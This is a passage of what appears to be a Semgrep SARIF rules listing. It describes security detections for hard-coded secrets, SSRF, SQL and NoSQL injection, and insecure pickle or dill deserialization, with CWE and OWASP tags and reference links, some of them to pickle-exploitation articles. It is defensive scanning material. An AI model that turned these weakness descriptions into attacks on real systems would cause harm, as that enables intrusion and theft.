'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","id":"python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","name":"python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","id":"javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","name":"javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client."},"help":{"markdown":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","id":"swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","name":"swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","properties":{"precision":"very-high","tags":["CWE-321: Use of Hard-coded Cryptographic Key","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"help":{"markdown":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.taint-cookie-http-false.taint-cookie-http-false)\n - [https://www.php.net/manual/en/function.setcookie.php](https://www.php.net/manual/en/function.setcookie.php)\n - [https://www.php.net/manual/en/function.session-set-cookie-params.php](https://www.php.net/manual/en/function.session-set-cookie-params.php)\n - [https://www.php.net/manual/en/configuration.file.php](https://www.php.net/manual/en/configuration.file.php)\n","text":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"helpUri":"https://semgrep.dev/r/php.lang.security.taint-cookie-http-false.taint-cookie-http-false","id":"php.lang.security.taint-cookie-http-false.taint-cookie-http-false","name":"php.lang.security.taint-cookie-http-false.taint-cookie-http-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.taint-cookie-http-false.taint-cookie-http-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Stripe API Key detected"},"help":{"markdown":"Stripe API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Stripe API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","id":"generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","name":"generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","id":"python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","name":"python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST')."},"help":{"markdown":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST').\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping)\n - [https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_UNRESTRICTED_REQUEST_MAPPING](https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_UNRESTRICTED_REQUEST_MAPPING)\n","text":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST')."},"helpUri":"https://semgrep.dev/r/java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","id":"java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","name":"java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality."},"help":{"markdown":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.hostpid-pod.hostpid-pod)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces)\n","text":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.hostpid-pod.hostpid-pod","id":"yaml.kubernetes.security.hostpid-pod.hostpid-pod","name":"yaml.kubernetes.security.hostpid-pod.hostpid-pod","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.hostpid-pod.hostpid-pod"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Make sure that unverified user data can not reach `vm2`."},"help":{"markdown":"Make sure that unverified user data can not reach `vm2`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-vm2-injection.express-vm2-injection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html)\n","text":"Make sure that unverified user data can not reach `vm2`."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-vm2-injection.express-vm2-injection","id":"javascript.express.security.express-vm2-injection.express-vm2-injection","name":"javascript.express.security.express-vm2-injection.express-vm2-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-vm2-injection.express-vm2-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/;](https://davidhamann.de/2020/04/05/exploiting-python-pickle/;)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f)](https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f))\n - [https://pytorch.org/docs/stable/generated/torch.load.html](https://pytorch.org/docs/stable/generated/torch.load.html)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","id":"python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","name":"python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","id":"python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","name":"python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead"},"help":{"markdown":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY)\n - [https://bento.dev/checks/flask/avoid-hardcoded-config/](https://bento.dev/checks/flask/avoid-hardcoded-config/)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features)\n","text":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead"},"helpUri":"https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","id":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","name":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`."},"help":{"markdown":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli)\n - [https://www.rubydoc.info/gems/pg/PG/Connection](https://www.rubydoc.info/gems/pg/PG/Connection)\n","text":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","id":"ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","name":"ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","id":"kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","name":"kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2."},"help":{"markdown":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","id":"kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","name":"kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.jpa-sqli.jpa-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","id":"java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","name":"java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.jpa-sqli.jpa-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"help":{"markdown":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","id":"java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","name":"java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-dill.tainted-dill)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-dill.tainted-dill","id":"python.lang.deserialization.tainted-dill.tainted-dill","name":"python.lang.deserialization.tainted-dill.tainted-dill","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-dill.tainted-dill"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this 